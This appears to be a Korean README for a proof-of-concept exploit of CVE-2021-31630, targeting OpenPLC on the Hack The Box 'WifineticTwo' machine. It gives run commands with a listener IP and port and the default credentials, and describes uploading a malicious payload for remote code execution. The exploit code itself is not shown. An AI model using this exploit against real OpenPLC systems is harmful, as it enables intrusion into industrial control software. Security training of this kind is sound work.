
CVE-2021-31630에 대한 개념 증명(PoC) 익스플로잇으로, Hack The Box 플랫폼의 WifineticTwo 상자에서 실행되는 OpenPLC 서비스를 대상으로 합니다.
Hack The Box의 WifineticTwo box에서 OpenPLC를 위한 CVE-2021-31630 익스플로잇 PoC, 이 스크립트는 CVE-2021-31630에 대한 Proof of Concept (PoC) 익스플로잇으로, Hack The Box 플랫폼의 WifineticTwo box에서 실행 중인 OpenPLC 서비스를 대상으로 합니다.
python exploit.py -ip <IP_ADDRESS_FOR_LISTEN> -p <PORT_FOR_LISTEN> -u <USERNAME> -pwd <PASSWORD>
python ./exploit.py -ip 10.10.16.5 -p 1337 -u openplc -pwd openplc
-ip <IP_ADDRESS>: 수신할 IP 주소를 지정합니다.-p : 수신할 포트를 지정합니다.-u : OpenPLC 로그인에 사용할 사용자 이름을 지정합니다.-pwd : OpenPLC 로그인에 사용할 비밀번호를 지정합니다.이 스크립트는 OpenPLC의 CVE-2021-31630 취약점을 악용하여 WifineticTwo box에서 원격 코드 실행을 가능하게 합니다. 대상 IP와 포트에 연결하고 제공된 사용자 이름과 비밀번호로 인증한 후 악성 페이로드를 업로드하여 임의 코드를 실행합니다.
z1ntrx에 의해 작성됨
이 스크립트는 교육 및 테스트 목적으로만 제공됩니다. 책임감 있게 사용하고, 테스트할 명시적 권한이 있는 시스템에서만 사용하십시오.